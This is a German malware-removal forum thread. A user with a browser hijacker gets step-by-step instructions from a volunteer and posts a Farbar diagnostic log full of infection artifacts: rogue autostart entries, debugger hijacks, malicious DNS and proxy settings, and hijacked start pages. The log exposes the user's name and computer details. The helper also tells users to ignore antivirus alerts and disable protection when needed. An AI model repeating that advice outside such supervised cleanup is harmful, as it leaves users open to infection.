Zur點k   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: wie kann ich den ,,initialpage123创 virus beseitigen?

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder st鋘dig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu k鰊nen, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauensw黵dig ist und bis zur vollst鋘digen Entfernung der Malware nicht verwendet werden sollte.

Antwort
Alt 01.06.2017, 19:18   #1
NexsReloaded
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Ausrufezeichen

wie kann ich den ,,initialpage123创 virus beseitigen?



ich habe mir anscheinend den ,,initialpage123创 virus eingefangen und meine frage ist wie ich den jetzt wieder loswerden kann?

Infos:
- betriebssystem: windows 8.1

- ich kann keine programme mehr installieren bzw deinstallieren

- immer wenn ich meinen browser 鰂fne (egal ob chrome, firefox oder den internet explorer) es 鰂fnet sich immer die seite ,, hxxp://www.searchinme.com/?type=hp&ts=1496337285927&z=8418369e135aba01f46b08fg4z2t5e6m0o5oct6m9w&from=official&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX 创

-es werden auch von alleine programme wie ,,chromium创 oder ,,speed my pc创 installiert

-鰂ters werden auch von alleine die proxy einstellungen aktivirt

-nach dem starten des pc磗 鰂fnet sich immer f黵 ca.1 sekunde ein ,cmd fenster und darauf folgt ein ,,run.dll fehler创



kann mir bitte jemand helfen?

Alt 02.06.2017, 21:34   #2
M-K-D-B
/// TB-Ausbilder
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?









Mein Name ist Matthias und ich werde dir bei der Bereinigung deines Computers helfen.



Um die Bereinigung m鯿hlichst effektiv und schnell gestalten zu k鰊nen, bitte ich um Beachtung der folgenden Hinweise:
  1. Falls wir Hinweise auf illegal erworbene Software finden, werden wir den Support unterbrechen bis jegliche Art von illegaler Software vom Rechner entfernt wurde.
  2. Lies dir meine Anleitungen immer sorgf鋖tig durch, arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste immer alle Logdateien (auch wenn nichts gefunden wurde). Solltest du Probleme haben, stoppe mit deiner Bearbeitung und beschreibe mir dein Problem so gut es geht.
  3. Solltest du mir nicht innerhalb von 3 Tagen antworten, gehe ich davon aus, dass du keine Hilfe mehr ben鰐igst. Dann l鰏che ich dein Thema aus meinem Abo. Solltest du einmal l鋘ger abwesend sein, so gib mir bitte Bescheid!
  4. W鋒rend der Bereinigung bitte nichts installieren oder deinstallieren, au遝r ich bitte dich darum!
    Au遝rdem bitte ich dich, nicht eigenm鋍htig irgendwelche Sicherheitsprogramme auszuf黨ren und damit deinen Rechner zu 黚erpr黤en/bereinigen, da ich so leicht den 躡erblick verlieren kann.
    Au遝rdem h鋞test du dir das Er鰂fnen eines Themas in diesem Fall auch gleich sparen k鰊nen, wenn du dann doch wieder alleine rumhantierst.

  5. Bitte beachten: Download bei filepony.de: So ladet Ihr unsere Tools richtig!
  6. Alle zu verwendenen Programme sind auf dem Desktop ( C:\users\dein Benutzername\Desktop\ ) abzuspeichern und von dort als Administrator zu starten!
  7. Einige Programme, die wir hier verwenden, k鰊nen unter Umst鋘den von deinem Antiviren- oder Anti-Malwareprogramm f鋖schlicherweise als Bedrohung eingestuft werden. Die Sicherheitsprogramme k鰊nen aufgrund eines bestimmten Programmverhaltens nicht zwischen "gut" oder "b鰏e" unterscheiden und schlagen Alarm. Dabei handelt es sich um Fehlalarme, welche du getrost ignorieren kannst. Gegebenenfalls musst du deine Sicherheitssoftware vor der Ausf黨rung eines Programms deaktivieren, damit unsere Bereinigungsvorg鋘ge nicht beeintr鋍htigt werden.
  8. Sollten die Logdateien einmal die zul鋝sige L鋘ge (~ 120.000 Zeichen) 黚erschreiten, so teile die Logdateien auf mehrere Posts auf.
    Zur Not kannst du die Logdateien dann auch zippen (in ein .zip Archiv packen) und als Anhang hochladen.

  9. Bitte arbeite so lange mit mir zusammen, bis ich dir sage, dass wir fertig sind und dein Rechner "sauber" ist. Das vorzeitige Verschwinden von Symptomen hei遲 nicht automatisch, dass dein Rechner bereits vollst鋘dig sauber ist.
  10. In der Regel antworte ich dir innerhalb von 24 Stunden, oft sogar wesentlich schneller.
    Jedoch habe auch ich einen normalen Beruf und Familie. Ich bin daher nicht jeden Tag stundenlag hier im Forum unterwegs. Es kann unter Umst鋘den bis zu 2 Tage dauern, bis du eine Antwort von mir erh鋖tst. Sollte diese Zeit 黚erschritten sein, so kannst du mir gerne eine PM als Erinnerung schicken.





Bitte arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste alle Logdateien in CODE-Tags:
So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuh鋘gen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert deinem Helfer massiv die Arbeit, es sei denn nat黵lich die Datei w鋜e ansonsten zu gro f黵 das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdr點ke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und dr點ke STRG+V.
  • Klicke aauf Erweitert/Vorschau, um so pr黤en, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Danke f黵 deine Mitarbeit!







Schritt 1
Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • 膎dere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)







Schritt 2
Downloade dir bitte TDSSKiller TDSSKiller.exe und speichere diese Datei auf dem Desktop
  • Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
  • Dr點ke Start Scan
  • Sollten infizierte Objekte gefunden werden, w鋒le keinesfalls Cure. W鋒le Skip und klicke auf Continue.
    TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
    Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt
Poste den Inhalt bitte in jedem Fall hier in deinen Thread.







Bitte poste mit deiner n鋍hsten Antwort
  • die Logdatei von TDSS-Killer,
  • die beiden neuen Logdateien von FRST.
__________________

__________________

Alt 03.06.2017, 14:16   #3
NexsReloaded
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



ich kann tdss.killer nicht ausf黨ren. da kommt immer die meldung ,,nicht vertrauensw黵dige software创


FRST Logfile:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:13-04-2016
durchgef黨rt von Nick Schuster (Administrator) auf RAZERLAP (03-06-2017 14:01:57)
Gestartet von C:\Users\Nick Schuster\AppData\Local\Microsoft\Windows\INetCache\IE\BPT3LC5O
Geladene Profile: Nick Schuster (Verf黦bare Profile: Nick Schuster)
Platform: Windows 8.1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung f黵 Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
() C:\Windows\Temp\g50DA.tmp.exe
() C:\Windows\Temp\g50DC.tmp.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
() C:\ProgramData\windows\windows.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
() C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\WinStore\WSHost.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.3.9600.18384_none_fa1d93c39b41b41a\TiWorker.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zur點kgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [AirServer64] => C:\Program Files\App Dynamic\AirServer\AirServer.exe
HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
HKLM\...\Run: [gplyra] => C:\Users\Nick Schuster\AppData\Roaming\gplyra\gplyra.exe [1555968 2017-04-24] ()
HKLM-x32\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
HKLM-x32\...\Run: [Dropbox] => "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
HKLM-x32\...\Run: [KMS] => C:\Windows\kmsonboot\autoact.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [235624 2015-01-09] (CANON INC.)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1314432 2016-06-09] (CANON INC.)
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\RunOnce: [windows] => C:\ProgramData\windows\windows.exe [1052256 2017-01-03] ()
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\MountPoints2: {3b90a8ba-330f-11e7-83e4-0071c2420bd3} - "F:\autorun.exe" 
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\MountPoints2: {e8e722cc-412b-11e7-840b-0071c2420bd3} - "F:\OriginInstaller.exe" 
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\Winlogon: [Shell] explorer.exe,"C:\Users\Nick Schuster\AppData\Roaming\avv.exe" <==== ACHTUNG
HKU\S-1-5-18\...\Run: [sG4nE4Ad85qJ.exe] => C:\ProgramData\e9cf343f516c47a4a7255147ad1dcd13\sG4nE4Ad85qJ.exe [216576 2017-05-30] ()
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\rstrui.exe: [Debugger] rrtuy.exe
ShellExecuteHooks:  - {5EBD559E-A5BA-11E6-B9FD-64006A5CFC23} - C:\Users\Nick Schuster\AppData\Roaming\Phucusy\Pipothzo.dll Keine Datei [ ]
ShellExecuteHooks:  - {9C829CE8-039A-11E7-8F7F-64006A5CFC23} - C:\Users\Nick Schuster\AppData\Roaming\Anerpe\Zoduly.dll Keine Datei [ ]
ShellExecuteHooks:  - {234628B4-4048-11E7-9F2C-64006A5CFC23} - C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck\Thuvale.dll Keine Datei [ ]
ShellExecuteHooks:  - {A4CD8824-4049-11E7-9F11-64006A5CFC23} - C:\Users\Default\AppData\Roaming\Minerent\Wuteghtplejipy.dll [144896 2017-05-30] ()
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX64.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll Keine Datei
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  Keine Datei
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} =>  Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX32.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll Keine Datei
Startup: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2017-06-03]
Startup: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.exe [2017-06-03] ()
BootExecute: autocheck autochk * sh4native Sh4Removal
GroupPolicy: Beschr鋘kung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschr鋘kung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zur點kgesetzt, wenn es sich um einen Registryeintrag handelt.)

ProxyEnable: [.DEFAULT] => Proxy ist aktiviert.
ProxyServer: [.DEFAULT] => 127.0.0.1:8003
ProxyEnable: [S-1-5-19] => Proxy ist aktiviert.
ProxyServer: [S-1-5-19] => 127.0.0.1:8003
ProxyEnable: [S-1-5-20] => Proxy ist aktiviert.
ProxyServer: [S-1-5-20] => 127.0.0.1:8003
ProxyServer: [S-1-5-21-3847841184-804715454-2304624315-1001] => 127.0.0.1:8003
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.192.1
Tcpip\Parameters: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{04A2521B-7C11-484A-B28D-E9BE3102A821}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{8EA2322E-EF2C-4423-AF3C-3EE361FD417B}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Tcpip\..\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}: [DhcpNameServer] 192.168.192.1
Tcpip\..\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}: [DhcpNameServer] 82.163.143.157
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr鋘kung <======= ACHTUNG
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr鋘kung <======= ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490098796&z=edb8deb4a39db277332a2ebg6z4t7e1e3t2bdm2b1z&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3847841184-804715454-2304624315-1001 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = 
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (CANON INC.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-02-13] (Oracle Corporation)
